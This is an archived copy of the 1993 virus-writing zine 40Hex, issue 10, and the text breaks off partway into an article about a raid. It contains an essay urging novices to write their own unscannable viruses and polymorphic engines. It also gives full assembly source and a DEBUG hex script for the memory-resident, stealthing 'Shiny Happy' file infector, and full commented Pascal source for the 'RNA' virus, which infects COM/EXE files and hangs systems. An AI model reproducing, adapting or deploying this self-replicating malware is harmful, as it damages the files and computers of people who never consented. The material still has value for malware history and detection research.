💾 Archived View for gemini.spam.works › mirrors › textfiles › magazines › 40HEX › 40hex010 captured on 2022-06-12 at 10:05:33.
-=-=-=-=-=-=-
40Hex Issue 10 Volume 3 Number 1 File 000
Welcome back to yet another issue of 40Hex, Phalcon/Skism's magazine chock
full of virus writing techniques, news, source code, and related info.
First off, Phalcon/Skism welcomes its newest member, FirstStrike. We have
watched him grow from humble beginnings and are confident that he will
continue to produce quality viruses in the future.
We will, beginning with this issue, be phasing out the debug scripts in
40Hex. Although many people find them useful, we feel that source code is
more interesting and worthwhile. The disassemblies are almost always done
by Dark Angel, who advises those with difficulty understanding some parts
of the disassemblies to first skim the entire disassembly to learn how the
virus works. Some portions, he continues, are not commented because their
functions are self-evident and the label names reflect their respective
purposes.
In the spirit of friendly competition, we have, in this issue, the Ontario
3 virus written by Death Angel of YAM. While on the topic of YAM, we find
it immensely amusing that they continue to adamantly state on FidoNet and
elsewhere that the IVP was not a mere hack of PS-MPC. Ok, it was a rewrite
in Pascal, but the only significant changes were in the labels; even the
comments were remarkably familiar. Please cease this farce; you are fooling
nobody.
40Hex-10 Table of Contents
March 13, 1993
File Description
0000............................You are here
0001............................Virus creation aids
0002............................Phalcon/Skism Shiny Happy virus
0003............................RNA virus source code
0004............................ARCV Busted
0005............................Green Caterpillar Debug Script
0006............................Virus Spotlite: Bad Boy 2
0007............................A Case Against Encryption
0008............................Ontario 3 source code
0009............................40Hex Survey
Greets to: NuKE, The Attitude Adjuster, and all virus enthusiasts around
the world.
Goodbye & best wishes to : Apache Warrior, ICE-9, and the rest of the ARCV.
-)Gheap
40Hex Issue 10 Volume 3 Number 1 File 001
The following is a cursory examination of virus construction toolkits.
While hardly comprehensive, it includes the basic elements of each
toolkit described. For further information, consult appendix A of
the Phalcon/Skism G? code generator.
---------------------------------------------------------------------------
VIRUS CONSTRUCTION KITS, Revision 2.0 13 February 1993
Virus construction kits are computer programs which allow people
with little or no programming experience to produce new variants of
computer viruses.
Two popular methods are used in virus construction kits. The first
uses a menu driven user interface where the user is lead through a
series of menus where he 'designs' the replication method, infection
criteria and payload (what the virus does when it activates). The
second method uses a skeleton configuration file (ASCII file in
which virus configurations are placed) and running a 'generator' to
produce the virus.
There is an important factor to consider. First generation virus
construction kits only produce assembled or compiled viruses without
source code. Second generation kits produce virus source code
(sometimes even commented) that can be changed and assembled by the
user. The danger in second generation kits is that someone with very
limited programming experience can potentially produce a new
computer virus without knowing anything about the internal workings
of a virus.
I would like to stress that because virus construction kits to date
use a fair amount of constant code (instructions), they pose no
threat to standard virus detection techniques. However, should
future kits make use of mutation engine principles, this situation
could change.
The following are descriptions of virus construction kits to date.
This is a factual description as the author has access to all of the
kits listed below :
GENVIR
GENVIR was the first attempt to release a virus construction kit for
profit. It is a first generation virus construction kit which a
menu-driven interface. GENVIR is a French program written in 1990 by
J.Struss of Lochwiller, France. It is a 'Crippleware' program that
lets you go through all the motions of creating a virus, but stops
short of the compilation stage. To receive a working copy, one must
license the software for a fee of 120 Frances. The latest version is
1.0 and it is believed that GENVIR was never released as a functional
virus construction kit.
VCS (Virus Construction Set)
VCS is a first generation virus kit written in 1991 by a German group
called VDV (Verband Deutscher Virenliebhaber). VCS is a primitive
program that requires a text file of maximum 512 bytes length and
incorporates this text into a simple .COM file virus infector. After
a specified number of replications, the virus will display the text
message and delete AUTOEXEC.BAT and CONFIG.SYS. The latest release is
version 1.0. The program text is in German,although there is a hacked
version in English.
VCL (Virus Construction Laboratory)
VCL is a complex, second generation, menu driven virus construction
kit written in 1992 by Nowhere Man and [NuKE] WaReZ. It allows
multiple, user selectable modules to be incorporated into the virus,
together with the option of creating commented ASM (assembler) source
code files that can be manually modified. The danger with this option
is that a virus writer can create the virus kernel (without knowing
much about the internal workings of viruses) using VCL and then add
his own,custom code into the virus.The latest release is version 1.0.
PS-MPC (Phalcon / Skism - Mass Produced Code Generator)
PS-MPC is a second generation virus construction kit, written by Dark
Angel in July 1992. It is based heavily on the VCL virus construction
kit. It was distributed including source code in the C language.
Although it is not menu driven, (it uses a user definable skeleton
configuration file to produce viruses) it creates more compact,neater
commented ASM source code than VCL does. Two versions exist,the first
being version 0.90beta released together with 40Hex (an underground
electronic magazine) on 7 July 1992, and version 0.91beta released on
17 August 1992. According to the history file in this release, the
following as been added to the second release : a) rudimentary memory
resident viruses may be created, b) improved optimization of code,
c) fixed minor quirks and d) got rid of "unsigned char" requirement.
IVP (Instant Virus Production Kit)
IVP is a second generation virus construction kit, written in 1992 by
Admiral Bailey a member of the YAM (Youngsters Against McAfee)
underground group. According to the documentation, it was written in
Turbo Pascal version 7.0. IVP uses a skeleton configuration approach
and produces commented source code. It was the following features :
a) .EXE and .COM file infection, b) Trojan support, c) Directory
changing, d) encryption, e) error handling, f) COMMAND.COM infection,
g) overwriting option and h) random nop generator. The latest release
is version 1.0.
G2 (G Squared)
G2 is a second generation virus construction kit, written in 1993 by
Dark Angel of the Phalcon/Skism underground group.(Dark Angel is also
the author of the PS-MPC virus construction kit). This kit makes use
of the skeleton configuration approach and produces commented source
code. According to Dark Angel's documentation, G2 is not a
modification of the Phalcon/Skism PS-MPC kit, but a complete rewrite.
It differs from other virus construction kits in that it produces
easily upgradable and semi-polymorphic routines. The latest release
is version 0.70beta, dated January 1, 1993.
Oliver Steudler, DYNAMIC SOLUTIONS
Authorized McAfee Associates Anti Virus Agent
Mail : P.O.Box 4397, Cape Town, 8000, South Africa
Internet : Oliver.Steudler@f110.n7102.z5.fidonet.ORG
or 100075.0200@compuserve.COM
Fidonet : 5:7102/110
CompuServe : 100075,0200
Phone : +27 (21) 24-9504 (GMT +2)
Fax : +27 (21) 26-1911
BBS: : +27 (21) 24-2208 [1200-14,400 bps]
---------------------------------------------------------------------------
Virus construction tools are cropping up at the rate of one roughly every
two months. Additionally, new polymorphic "engines" such as the MtE, TPE,
etc. are begining to emerge. But how real is the threat from viruses
generated with such tools and has this threat been exaggerated by the
media?
The discussion will center on the so-called "second generation" toolkits.
Perhaps the most prolific of these is Nowhere Man's VCL. It has the most
attractive interface of all the recent virus development tools and allows for
a variety of activation routines; something which has been conspicuously
absent from the Phalcon/Skism code generators. However, VCL is also perhaps
the least dangerous of all the toolkits, hampered by the dependance upon only
one encryption/decryption routine and single, constant code base. YAM's IVP
ameliorates the problem, albeit in a highly limited and somewhat useless
fashion, with the random NOP placement. Of course, its code is based heavily
upon the PS-MPC, which is also nonrandom, so it, too, is hampered. The
PS-MPC, as mentioned earlier, has but a single code base. In short, these
three toolkits are of limited utility in terms of creating nonscannable
viruses "out of the box." The generated code typically needs to be modified
for the viruses to be unscannable.
So perhaps the solution lies in relying not upon a single code base, but
multiple code bases and allowing for random (not the same as haphazard)
placement of individual lines of code. This is the approach of G?. G?
allows for multiple code packages which accomplish a certain goal. The
program selects one of the packages for inclusion in a given virus. In
this manner, variability may be ensured. G? further allows for the order
of statements to be scrambled in the source file. However, all G? viruses
share the same structure as well as having certain bits of code in common.
So, while an improvement, it is hardly the final step in the evolution of
virus creation toolkits. G? could become much more powerful with multiple
virus structures as well as improved code packages.
The article above suggested that the toolkits would be much more powerful
should they incorporate "mutation engine principles." In other words, the
toolkits should be able to mutate the generated code. The IVP currently
uses such an approach, albeit only with simple NOPs liberally scattered in the
decryption and delta offset calculation routines. Such code, however, should
not be a goal of the authors of such toolkits. It is simply not appropriate
for a virus creator to function in such a manner. A virus toolkit which
simply spews out the same code in various forms is merely an overblown hack
generator. Toolkits exist as _aids_ in writing a virus, not as replacements.
Surely including such mutation routines would result in larger viruses as well
as illegible code. A novice utilising the toolkit would not be able to learn
from such unoptimised code. Tight code which doesn't sacrifice legibility
should always be the goal of virus generators.
Another aid in writing viruses is the "encryptor-in-a-box," a product such
as MtE or TPE. Such modules allow all viruses to incorporate polymorphic
routines. Yet how dangerous are such polymorphers? As they currently exist,
they pose very little threat. Scanners have adapted not only to catch current
MtE-using viruses reliably, but also to find new viruses which use decryptors
created with MtE. Certainly the TPE and any new polymorphic routines will meet
the same fate. Constant revisions of these engines, while being temporary
solutions, remain just that: temporary. Once the anti-virus industry receives
a copy of the new version, the engine is once again useless.
The virus community should look beyond such "easy fixes" as virus creation
toolkits and polymorphic "engines." The simplest way to get a nonscannable
virus is to write it yourself. Not only is there the benefit of satisfaction
with the work, but you gain expertise and intimate understanding of both
viruses and the operating system. Such knowledge comes only with writing
several viruses on your own. The best way for a beginner to learn how to
write viruses is to figure it out on his own _without_ any examples. Once a
virus has been written in this manner, then it is appropriate to look at
current virus samples to find out the various tried and true techniques.
But polymorphic engines are difficult to write, the novice virus writer
protests; using MtE will vastly improve the virus. Rubbish. Firstly, it is
a fact that scanners will be able to detect the virus, be it encrypted with a
simple XOR loop or with MtE. Writing your own encryption will be far better
in terms of learning. Secondly, polymorphic engines are _not_ terribly
difficult to create. A few hours of thinking will be sufficient to lay down
the framework of a polymorphic engine. An additional few days is enough for
coding. Even the MtE and TPE, while requiring bit-level knowledge of the
opcodes, could have been written by a person with only a few years of
experience programming assembly. The advantages of writing your own
polymorphic engine are obvious; anti-virus developers will have to spend much
time (and space in their products) analysing and developing scanners for each
individual engine; and simply adding a few extra garbling instructions should
be sufficient to throw these scanners off in a future virus.
So what purpose do these tools serve? The ultimate aim of those producing the
virus creation tools should be not to enable people to go around creating new,
unscannable viruses and trashing every hard drive in the world, but to allow
novices to break into the field of virus writing. It is not difficult to
write a virus, but these tools certainly ease the initial pain. Polymorphic
engines are useful as examples for your own polymorphic routines.
I encourage all novice programmers to pick up a copy of Phalcon/Skism's G? and
VCL, the two most prolific code generation toolkits. Run them a few times with
various parameters and analyse the code carefully. Print out the code and look
it over. The basic principles of virus creation will be apparent after some
inspection. Learn from it and then sit down and write your own virus from
scratch.
Dark Angel
Phalcon/Skism 1993
40Hex Issue 10 Volume 3 Number 1 File 002
The Phalcon/Skism Shiny Happy Virus
This virus was written jointly by Dark Angel and Hellraiser about six
months ago. It is a simple semi-stealth virus that doesn't actually replace
interrupt 21h's vector in the interrupt table. Instead, it finds the DOS
interrupt 21h entry point and encodes an int 3 as the first byte. Consequently,
it is highly debugger-resistant. It also hides the file size increase, albeit
only in DOS directory listings. This way, it avoids the CHKDSK cross-linking
errors common to viruses hooking FCB find first/next. The virus infects upon
file executions. A debug script follows the source code. As always, type
"DEBUG < DEBUG.SCR > NUL" to create the virus from the debug script.
The virus always activates, hooking the keyboard interrupt. When it
detects a happy face (emoticon), the virus changes it to a frown. The Shiny
Happy residency test follows:
Run the cursor across the following line:
:-) =) \|-) ;) :*)
If any of the faces changed to frowns, then Shiny Happy is loose on your
system.
-)Gheap
-------------------------------------------------------------------------------
; The Shiny Happy Virus
; By Hellraiser and Dark Angel of Phalcon/Skism
.model tiny
.code
id = '52'
timeid = 18h
shiny:
call next
next: pop bp
push ds
push es
xor di,di
mov ds,di
cmp word ptr ds:[1*4],offset int1_2 ; installation check
jz return
mov ax,es
dec ax
sub word ptr ds:[413h],(endheap-shiny+1023)/1024
mov ds,ax
sub word ptr ds:[3],((endheap-shiny+1023)/1024)*64
sub word ptr ds:[12h],((endheap-shiny+1023)/1024)*64
mov es,word ptr ds:[12h]
push cs
pop ds
lea si,[bp+shiny-next]
mov cx,(endheap-shiny+1)/2
rep movsw
push cs
lea ax,[bp+return-next]
push ax
push es
mov ax,offset highentry
push ax
retf
return:
cmp sp,id-4
jz returnEXE
returnCOM:
pop es
pop ds
mov di,100h
push di
lea si,[bp+offset save3-next]
movsw
movsb
retn
returnEXE:
pop es
pop ds
mov ax,es
add ax,10h
add word ptr cs:[bp+origCSIP+2-next],ax
cli
add ax,word ptr cs:[bp+origSPSS-next]
mov ss,ax
mov sp,word ptr cs:[bp+origSPSS+2-next]
sti
db 0eah
origCSIP db ?
save3 db 0cdh,20h,0
origSPSS dd ?
highentry:
mov cs:in21flag,0
xor ax,ax
mov ds,ax
les ax,ds:[9*4]
mov word ptr cs:oldint9,ax
mov word ptr cs:oldint9+2,es
mov ds:[9*4],offset int9
mov ds:[9*4+2],cs
les ax,ds:[21h*4]
mov word ptr cs:oldint21,ax
mov word ptr cs:oldint21+2,es
mov word ptr ds:[1*4],offset int1
mov ds:[1*4+2],cs
mov ah, 52h
int 21h
mov ax,es:[bx-2]
mov word ptr cs:tunnel21+2, ax
mov word ptr cs:dosseg_, es
pushf
pop ax
or ah,1
push ax
popf
mov ah,0bh
pushf
db 09Ah
oldint21 dd ?
mov word ptr ds:[3*4],offset int3
mov ds:[3*4+2],cs
mov word ptr ds:[1*4],offset int1_2
les bx,cs:tunnel21
mov al,0CCh
xchg al,byte ptr es:[bx]
mov byte ptr cs:save1,al
retf
authors db 'Shiny Happy Virus by Hellraiser and Dark Angel of Phalcon/Skism',0
int1: push bp
mov bp,sp
push ax
mov ax, [bp+4]
cmp ax,word ptr cs:tunnel21+2
jb foundint21
db 3dh ; cmp ax, xxxx
dosseg_ dw ?
ja exitint1
foundint21:
mov word ptr cs:tunnel21+2,ax
mov ax,[bp+2]
mov word ptr cs:tunnel21,ax
and byte ptr [bp+7], 0FEh
exitint1:
pop ax
pop bp
iret
int1_2: push bp
mov bp,sp
push ax
mov ax, [bp+4]
cmp ax,word ptr cs:tunnel21+2
ja exitint1_2
mov ax, [bp+2]
cmp ax,word ptr cs:tunnel21
jbe exitint1_2
push ds
push bx
lds bx,cs:tunnel21
mov byte ptr ds:[bx],0CCh
pop bx
pop ds
and byte ptr [bp+7],0FEh
exitint1_2:
pop ax
pop bp
iret
infect_others:
mov ax,4301h
push ax
push ds
push dx
xor cx,cx
call callint21
mov ax,3d02h
call callint21
xchg ax,bx
mov ax,5700h
call callint21
push cx
push dx
mov ah,3fh
mov cx,1ah
push cs
pop ds
push cs
pop es
mov dx,offset readbuffer
call callint21
mov ax,4202h
xor cx,cx
cwd
int 21h
mov si,offset readbuffer
cmp word ptr [si],'ZM'
jnz checkCOM
checkEXE:
cmp word ptr [si+10h],id
jz goalreadyinfected
mov di, offset OrigCSIP
mov si, offset readbuffer+14h
movsw
movsw
sub si, 18h-0eh
movsw
movsw
push bx
mov bx, word ptr readbuffer + 8
mov cl, 4
shl bx, cl
push dx
push ax
sub ax, bx
sbb dx, 0
mov cx, 10h
div cx
mov word ptr readbuffer+14h, dx
mov word ptr readbuffer+16h, ax
mov word ptr readbuffer+0Eh, ax
mov word ptr readbuffer+10h, id
pop ax
pop dx
pop bx
add ax, heap-shiny
adc dx, 0
mov cl, 9
push ax
shr ax, cl
ror dx, cl
stc
adc dx, ax
pop ax
and ah, 1
mov word ptr readbuffer+4, dx
mov word ptr readbuffer+2, ax
mov cx,1ah
jmp short finishinfection
checkCOM:
xchg cx,ax
sub cx,heap-shiny+3
cmp cx,word ptr [si+1]
goalreadyinfected:
jz alreadyinfected
add cx,heap-shiny
push si
mov di,offset save3
movsw
movsb
pop di
mov al,0e9h
stosb
mov ax,3 ; cx holds bytes to write
xchg ax,cx
stosw
finishinfection:
push cx
mov ah,40h
mov cx,heap-shiny
cwd ; xor dx,dx
call callint21
mov ax,4200h
xor cx,cx
cwd
int 21h
mov ah,40h
pop cx
mov dx,offset readbuffer
call callint21
mov ax,5701h
pop dx
pop cx
and cl,0E0h
or cl,timeid
call callint21
jmp doneinfect
alreadyinfected:
pop ax
pop ax
doneinfect:
mov ah,3eh
call callint21
pop dx
pop ds
pop ax
pop cx
call callint21
exitexecute:
pop es
pop ds
pop di
pop si
pop dx
pop cx
pop bx
pop ax
popf
jmp exitint21
execute:
pushf
push ax
push bx
push cx
push dx
push si
push di
push ds
push es
cld
mov ax,4300h
call callint21
jc exitexecute
push cx
jmp infect_others
int3:
push bp
mov bp,sp
cmp cs:in21flag,0
jnz leaveint21
inc cs:in21flag
cmp ah,11h
jz findfirstnext
cmp ah,12h
jz findfirstnext
cmp ax,4b00h
jz execute
exitint21:
dec cs:in21flag
leaveint21:
or byte ptr [bp+7],1 ; set trap flag upon return
dec word ptr [bp+2] ; decrement offset
call restoreint21
pop bp
iret
callint21:
pushf
call dword ptr cs:tunnel21
ret
restoreint21:
push ds
push ax
push bx
lds bx,cs:tunnel21
mov al,byte ptr cs:save1
mov ds:[bx],al
pop bx
pop ax
pop ds
ret
findfirstnext:
int 21h ; pre-chain interrupt
; flags [bp+12]
; segment [bp+10]
; offset [bp+8]
; flags [bp+6]
; segment [bp+4]
; offset [bp+2]
; bp [bp]
pushf ; save results
pop [bp+6+6]
pop bp
push ax
push bx
push ds
push es
inc al
jz notDOS
mov ah,51h ; Get active PSP
int 21h
mov es,bx
cmp bx,es:[16h] ; DOS calling it?
jne notDOS
mov ah,2fh ; DTA -> ES:BX
int 21h
push es
pop ds
cmp byte ptr [bx],0FFh
jnz regularFCB
add bx,7
regularFCB:
cmp word ptr [bx+9],'OC'
jz checkinf
cmp word ptr [bx+9],'XE'
jnz notDOS
checkinf:
mov al,byte ptr [bx+23]
and al,1Fh
cmp al,timeid
jnz notDOS
subtract:
sub word ptr [bx+29],heap-shiny
sbb word ptr [bx+31],0
notDOS:
pop es
pop ds
pop bx
pop ax
dec cs:in21flag
cli
add sp,6
iret
int9:
pushf ; save flags, regs, etc...
push ax
push bx
push cx
push dx
xor bx,bx
mov ah,0fh ; get video mode
int 10h
mov ah,03h ; get curs pos
int 10h
call getattrib
cmp al,')' ; happy??
jne audi5000 ; no
mov cs:eyesflag,0
beforeloveshack:
call getattrib ; see if there is a nose
loveshack:
cmp al,':' ; shiny???
je realeyes
cmp al,'=' ; check for even =)
je realeyes
cmp al,'|'
je realeyes
cmp al,';'
je realeyes
cmp cs:eyesflag,0
jnz audi5001
cmp al,'('
jz audi5001
inc cs:eyesflag
inc bl
jmp short beforeloveshack
realeyes:
stc
adc dl,bl ; add extra backspace if so
mov ah,02h
int 10h
mov ax,0a28h ; 0ah, '(' ; write frown
mov cx,1
int 10h
jmp audi5000
audi5001:
stc
adc dl,bl
audi5000:
inc dl ; set curs pos
mov ah,02h
int 10h
pop dx ; restore all stuff
pop cx
pop bx
pop ax
popf
db 0eah
oldint9 dd ?
; reads the char at the current cursorpos - 1
getattrib:
dec dl ; set curs pos
mov ah,02h
int 10h
mov ah,08h ; get char at curs
int 10h
ret
heap:
save1 db ?
tunnel21 dd ?
in21flag db ?
eyesflag db ?
readbuffer db 1ah dup (?)
endheap:
end shiny
-------------------------------------------------------------------------------
n shiny.com
e 0100 E8 00 00 5D 1E 06 33 FF 8E DF 81 3E 04 00 4D 01
e 0110 74 2D 8C C0 48 83 2E 13 04 01 8E D8 83 2E 03 00
e 0120 40 83 2E 12 00 40 8E 06 12 00 0E 1F 8D 76 FD B9
e 0130 DD 01 F3 A5 0E 8D 46 3C 50 06 B8 71 00 50 CB 81
e 0140 FC 2E 35 74 0C 07 1F BF 00 01 57 8D 76 67 A5 A4
e 0150 C3 07 1F 8C C0 05 10 00 2E 01 46 68 FA 2E 03 46
e 0160 6A 8E D0 2E 8B 66 6C FB EA 00 CD 20 00 00 00 00
e 0170 00 2E C6 06 9E 03 00 33 C0 8E D8 C4 06 24 00 2E
e 0180 A3 8A 03 2E 8C 06 8C 03 C7 06 24 00 26 03 8C 0E
e 0190 26 00 C4 06 84 00 2E A3 C5 00 2E 8C 06 C7 00 C7
e 01A0 06 04 00 28 01 8C 0E 06 00 B4 52 CD 21 26 8B 47
e 01B0 FE 2E A3 9C 03 2E 8C 06 37 01 9C 58 80 CC 01 50
e 01C0 9D B4 0B 9C 9A 00 00 00 00 C7 06 0C 00 85 02 8C
e 01D0 0E 0E 00 C7 06 04 00 4D 01 2E C4 1E 9A 03 B0 CC
e 01E0 26 86 07 2E A2 99 03 CB 53 68 69 6E 79 20 48 61
e 01F0 70 70 79 20 56 69 72 75 73 20 62 79 20 48 65 6C
e 0200 6C 72 61 69 73 65 72 20 61 6E 64 20 44 61 72 6B
e 0210 20 41 6E 67 65 6C 20 6F 66 20 50 68 61 6C 63 6F
e 0220 6E 2F 53 6B 69 73 6D 00 55 8B EC 50 8B 46 04 2E
e 0230 3B 06 9C 03 72 05 3D 00 00 77 0F 2E A3 9C 03 8B
e 0240 46 02 2E A3 9A 03 80 66 07 FE 58 5D CF 55 8B EC
e 0250 50 8B 46 04 2E 3B 06 9C 03 77 1A 8B 46 02 2E 3B
e 0260 06 9A 03 76 10 1E 53 2E C5 1E 9A 03 C6 07 CC 5B
e 0270 1F 80 66 07 FE 58 5D CF B8 01 43 50 1E 52 33 C9
e 0280 E8 32 01 B8 02 3D E8 2C 01 93 B8 00 57 E8 25 01
e 0290 51 52 B4 3F B9 1A 00 0E 1F 0E 07 BA A0 03 E8 14
e 02A0 01 B8 02 42 33 C9 99 CD 21 BE A0 03 81 3C 4D 5A
e 02B0 75 5C 81 7C 10 32 35 74 5D BF 69 00 BE B4 03 A5
e 02C0 A5 83 EE 0A A5 A5 53 8B 1E A8 03 B1 04 D3 E3 52
e 02D0 50 2B C3 83 DA 00 B9 10 00 F7 F1 89 16 B4 03 A3
e 02E0 B6 03 A3 AE 03 C7 06 B0 03 32 35 58 5A 5B 05 99
e 02F0 03 83 D2 00 B1 09 50 D3 E8 D3 CA F9 13 D0 58 80
e 0300 E4 01 89 16 A4 03 A3 A2 03 B9 1A 00 EB 1D 91 81
e 0310 E9 9C 03 3B 4C 01 74 3E 81 C1 99 03 56 BF 6A 00
e 0320 A5 A4 5F B0 E9 AA B8 03 00 91 AB 51 B4 40 B9 99
e 0330 03 99 E8 80 00 B8 00 42 33 C9 99 CD 21 B4 40 59
e 0340 BA A0 03 E8 6F 00 B8 01 57 5A 59 80 E1 E0 80 C9
e 0350 18 E8 61 00 EB 02 58 58 B4 3E E8 58 00 5A 1F 58
e 0360 59 E8 51 00 07 1F 5F 5E 5A 59 5B 58 9D EB 35 9C
e 0370 50 53 51 52 56 57 1E 06 FC B8 00 43 E8 36 00 72
e 0380 E3 51 E9 F3 FE 55 8B EC 2E 80 3E 9E 03 00 75 19
e 0390 2E FE 06 9E 03 80 FC 11 74 34 80 FC 12 74 2F 3D
e 03A0 00 4B 74 CB 2E FE 0E 9E 03 80 4E 07 01 FF 4E 02
e 03B0 E8 09 00 5D CF 9C 2E FF 1E 9A 03 C3 1E 50 53 2E
e 03C0 C5 1E 9A 03 2E A0 99 03 88 07 5B 58 1F C3 CD 21
e 03D0 9C 8F 46 0C 5D 50 53 1E 06 FE C0 74 3B B4 51 CD
e 03E0 21 8E C3 26 3B 1E 16 00 75 2E B4 2F CD 21 06 1F
e 03F0 80 3F FF 75 03 83 C3 07 81 7F 09 43 4F 74 07 81
e 0400 7F 09 45 58 75 12 8A 47 17 24 1F 3C 18 75 09 81
e 0410 6F 1D 99 03 83 5F 1F 00 07 1F 5B 58 2E FE 0E 9E
e 0420 03 FA 83 C4 06 CF 9C 50 53 51 52 33 DB B4 0F CD
e 0430 10 B4 03 CD 10 E8 56 00 3C 29 75 42 2E C6 06 9F
e 0440 03 00 E8 49 00 3C 3A 74 21 3C 3D 74 1D 3C 7C 74
e 0450 19 3C 3B 74 15 2E 80 3E 9F 03 00 75 1E 3C 28 74
e 0460 1A 2E FE 06 9F 03 FE C3 EB D8 F9 12 D3 B4 02 CD
e 0470 10 B8 28 0A B9 01 00 CD 10 EB 03 F9 12 D3 FE C2
e 0480 B4 02 CD 10 5A 59 5B 58 9D EA 00 00 00 00 FE CA
e 0490 B4 02 CD 10 B4 08 CD 10 C3
rcx
0399
w
q
-------------------------------------------------------------------------------
40Hex Issue 10 Volume 3 Number 1 File 003
The following is the source code for the RNA virus, a Pascal virus which
preserves the functionality of the EXE files which it infects. It is a
primitive virus, but is an example of a parasitic virus not written in
assembly.
-------------------------------------------------------------------------------
{$i-}{$m 2048,0,24576}
Program RNA;
{ Commenting by Dark Angel of Phalcon/Skism }
{ for 40Hex Issue 10 Volume 3 Number 1 }
uses dos;
const blksize=8192; { buffer size }
vsize=7200; { length of virus }
wc='*.'; { part of file mask }
counter=blksize-1; { location of the counter }
cb=':\'; { colon backslash }
maxinf:byte=4; { max # infections }
maxruns:byte=48; { # runs before disinfection }
drives:array[3..4] of char=('C','D'); { name of the drives }
imf:string[12]='ux142.rqz'; { temporary file name }
type vtype=array[1..vsize] of byte; { type of buffer for storing virus }
buftype=array[1..blksize] of byte; { type of buffer for file operations }
var ps:string; { path string }
s:pathstr; { currently running program }
ds:dirstr; { current directory }
ns:namestr; { filename of current program }
es:extstr; { extension of current program }
v:^vtype; { buffer for virus code }
buf:^buftype; { buffer for file copying }
count,indx,inf:byte;
attr,nr,nw:word;
sr:searchrec; { for find first/find next calls }
f,f2:file; { file handles }
t:longint; { file time/date storage }
procedure copyf; { copy file }
begin
repeat { copy the file in blocks }
blockread(f,buf^,blksize,nr); { read from the source file }
blockwrite(f2,buf^,nr,nw); { write to the target file }
until (eof(f)); { stop if end of file reached }
close(f); { close the source file }
setftime(f2,t); { set file time/date of target }
close(f2); { then close target file }
end;
Procedure stripf; { strip virus from the file }
begin
assign(f,s); { f = handle for current file }
reset(f,1); { prepare it for reading }
getftime(f,t); { save file creation time/date }
assign(f2,ds+imf); { create temporary file }
rewrite(f2,1); { prepare for writing }
seek(f,vsize); { go past virus }
copyf; { and copy uninfected file }
end;
procedure load; { load the virus from carrier file }
begin
assign(f,s); { f = handle for current file }
getfattr(f,attr); { get its file attributes }
reset(f,1); { and prepare it for reading }
if ioresult=0 then { continue if no failure }
begin
getftime(f,t); { get file creation time/date }
blockread(f,v^,vsize,nr); { read the virus to buffer }
count:=v^[vsize]-1; { get the counter from the buffer }
{ and decrement it }
v^[vsize]:=maxruns; { reset counter in buffer }
seek(f,vsize-1); { go to generation counter in buffer }
blockwrite(f,count,1,nr); { write new counter to file }
setftime(f,t); { restore file time/date }
close(f); { close the file }
setfattr(f,attr); { restore its file attributes }
end;
end;
function checkf(pth:dirstr):boolean; { check if file already infected }
var by:array[1..27] of byte; { buffer for checking marker bytes }
begin
checkf:=false; { default to don't infect }
if pos(sr.name,'COMMAND.COM')=0 then { don't infect COMMAND.COM }
begin
assign(f,pth+sr.name); { get filename }
reset(f,1); { open for reading }
if ioresult=0 then { continue if open ok }
begin
blockread(f,by,27,nr); { start checking the file }
for indx:=1 to 27 do { to see if the virus is }
if (by[indx])<>(v^[indx]) then { already there }
checkf:=true; { if not, return infect ok }
close(f); { close the file }
end;
end;
end;
procedure attach(pth:dirstr); { attach virus to start of file }
begin
inc(inf); { increment infection counter }
assign(f2,pth+'zSqA.th'); { create temporary file }
rewrite(f2,1); { open for writing }
if ioresult=0 then { continue if no errors }
begin
assign(f,pth+sr.name); { open file to infect }
getfattr(f,attr); { save its attributes }
reset(f,1); { open for reading }
getftime(f,t); { save its creation time/date }
blockwrite(f2,v^,vsize,nr); { write the virus to the temp file }
copyf; { copy the file to infect to the }
erase(f); { temp file and erase original }
rename(f2,sr.name); { rename the temp file to the name }
setfattr(f2,attr); { of the original and restore file }
end; { attributes }
end;
procedure rep(pth:dirstr;ext:extstr); { replicate within a directory }
begin
findfirst(pth+wc+ext,hidden+archive+readonly,sr);
while (inf<maxinf) and (doserror=0) do { search for files to infect }
begin
if checkf(pth) then attach(pth); { infect if not already infected }
findnext(sr); { then continue for other files }
end;
end;
procedure wastetime;interrupt; { interrupt 1Ch handler }
begin
inc(t);
inline($90/$90/$90/$90/$90/$90); { NOP NOP NOP NOP NOP NOP }
if ((t mod 8640)=8639) then inline($4C); { crash after about 8 minutes }
end;
procedure replicate; { duplicate within path }
var tmp:dirstr; { holds a directory name }
begin
while (ps<>'') do { while more directories }
begin
indx:=pos(';',ps); { go to next directory }
if indx=0 then { if not found, then at }
begin { last directory }
tmp:=ps; { copy directory name to }
ps:=''; { variable }
end
else
begin
tmp:=copy(ps,1,indx-1); { copy directory name to }
ps:=copy(ps,indx+1,length(ps)-indx); { variable }
end;
if tmp[length(tmp)]<>'\' then tmp:=tmp+'\'; { concatenate '\' if it }
{ isn't already there }
rep(tmp,'cOm'); { infect *.COM }
rep(tmp,'exE'); { infect *.EXE }
end;
end;
procedure makep; { this makes a path if it }
{ isn't found in the system }
var b:byte;
begin
getdir(0,ps); { get current drive }
for b:=3 to 4 do { do this for C: and D: }
begin
ps:=ps+';'+drives[b]+cb+';'; { copy each drive to path }
findfirst(drives[b]+cb+wc,directory,sr); { check if dirs on drive }
while (doserror=0) and (length(ps)<240) do { if not, continue }
begin
ps:=ps+drives[b]+cb+sr.name+';'; { add all dirs to the path }
findnext(sr); { do it again and again }
end;
end;
end;
procedure grow;
begin
inf:=0; { reset infection counter }
ps:=getenv('path'); { get the current path }
if ps<>'' then replicate; { infect files if path found }
if inf<maxinf then { if not enough files infected }
begin
makep; { make a path }
replicate; { and then infect }
end;
end;
procedure remove; { disinfection routine }
begin
assign(f,s); { f = handle for currently running file }
erase(f); { delete the current file }
assign(f,ds+imf); { f = handle for disinfected copy }
rename(f,ns+es); { replace carrier file with disinfected copy }
end;
procedure runf; { run the original file }
begin
exec(ds+imf,paramstr(1)+paramstr(2)+paramstr(3));
assign(f,ds+imf); { delete disinfected copy }
erase(f);
end;
begin
new(v); { allocate memory to store virus }
new(buf); { allocate memory for file operations buffer }
s:=paramstr(0); { get filename of currently running program }
fsplit(s,ds,ns,es); { split to directory, name, and extension }
stripf; { strip infected file from executable }
load; { load the virus data to the buffer }
grow; { infect files }
if count=0 then remove; { disinfect if run maxruns times }
runf; { run the original file }
if count<3 then { slow system down if run many times }
begin
t:=0; { reset count variable }
setintvec($1c,@wastetime); { set clock tick handler }
keep(0); { and then stay resident }
end;
end.
-------------------------------------------------------------------------------
DA
40Hex Issue 10 Volume 3 Number 1 File 004
ARCV Busted!
by DecimatoR
Many of you who read this mag know of the ARCV, and most likely
know Apache Warrior, the president of the group. In December and January,
the ARCV members were raided by Scotland Yard officials, and had their
